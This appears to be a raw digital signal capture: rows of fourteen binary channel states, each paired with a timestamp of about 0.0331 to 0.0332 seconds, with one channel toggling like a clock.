1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3111020e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3111044e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3111068e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3111092e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3111116e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3111140e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3111168e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3111192e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3111220e-02 1,1,0,1,0,1,0,0,0,0,0,0,0,0,3.3111224e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111228e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111244e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111268e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111340e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111368e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111396e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111444e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111540e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111568e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111592e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111644e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111768e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111792e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111820e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111844e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111916e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3111968e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3111996e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112044e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112068e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112092e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112116e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112140e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112168e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112192e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112244e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112268e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112316e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3112324e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3112340e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3112364e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3112392e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3112420e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3112440e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3112468e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3112492e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3112516e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3112540e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3112564e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3112588e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112640e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112788e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112820e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112840e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112916e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3112964e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3112988e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113040e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113068e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113092e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113116e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113140e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113164e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113188e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113240e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113268e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113340e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113364e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113388e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113440e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113540e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113564e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113588e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113640e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113788e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113820e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113840e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113916e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3113964e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3113988e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114040e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114068e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114092e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114116e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114140e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114164e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114188e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114240e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114268e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114340e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114364e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114388e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114440e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114540e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114564e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114588e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114640e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114788e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114820e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114840e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114916e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3114964e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3114988e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115040e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115068e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115092e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115116e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115140e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115164e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115188e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115244e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115268e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115344e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115368e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115396e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115444e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115544e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115568e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115596e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115644e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115744e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115768e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115792e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115820e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115844e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3115892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3115916e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.3240904e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.3241100e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3241120e-02 0,0,1,1,0,0,0,0,0,0,0,1,0,1,3.3241152e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3241180e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.3241500e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3241524e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.3241548e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3241572e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.3241596e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3241624e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.3241648e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3241676e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.3241700e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.3241724e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3241736e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3241748e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3241772e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3241796e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3241824e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3241848e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3241876e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3241900e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3241924e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3241948e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3241972e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242024e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242048e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242076e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242100e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242124e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242148e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242172e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242196e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242224e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242248e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242276e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242300e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242324e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242348e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242372e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242396e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242424e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242448e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242476e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242500e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242524e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242548e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242600e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242624e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242648e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242676e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242700e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242724e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242748e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242772e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242796e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242824e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242848e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242876e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242900e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242924e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242948e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3242972e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3242996e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243028e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243052e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243076e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243100e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243124e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243148e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243176e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243200e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243228e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243252e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243276e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243324e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243352e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243404e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243428e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243476e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243500e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243552e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243576e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243628e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243652e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243700e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243724e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243752e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243776e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243800e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243828e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243852e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243876e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243900e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243924e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3243948e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3243980e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244004e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244028e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244056e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244080e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244108e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244132e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244156e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244180e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244204e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244228e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244256e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244280e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244308e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244332e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244356e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244380e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244404e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244428e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244456e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244480e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244508e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244528e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244556e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244580e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244604e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244628e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244684e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244704e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244728e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244756e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244780e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244804e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244828e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244856e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244880e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244908e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244932e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3244956e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3244980e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245004e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245028e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245056e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245080e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245108e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245132e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245156e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245180e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245204e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245228e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245256e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245280e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245308e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245332e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245356e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245380e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245404e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245428e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245456e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245480e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245508e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245532e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245556e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245580e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245604e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245628e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245656e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245680e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245708e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245732e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245756e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245780e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245804e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245828e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245856e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245880e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245908e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245932e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3245956e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3245980e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246004e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246028e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246056e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246080e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246108e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246132e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246156e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246180e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246204e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246228e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246256e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246280e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246308e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246332e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246356e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246380e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246404e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246428e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246456e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246480e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246508e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246532e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246556e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246580e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246604e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246628e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.3246656e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.3246680e-02 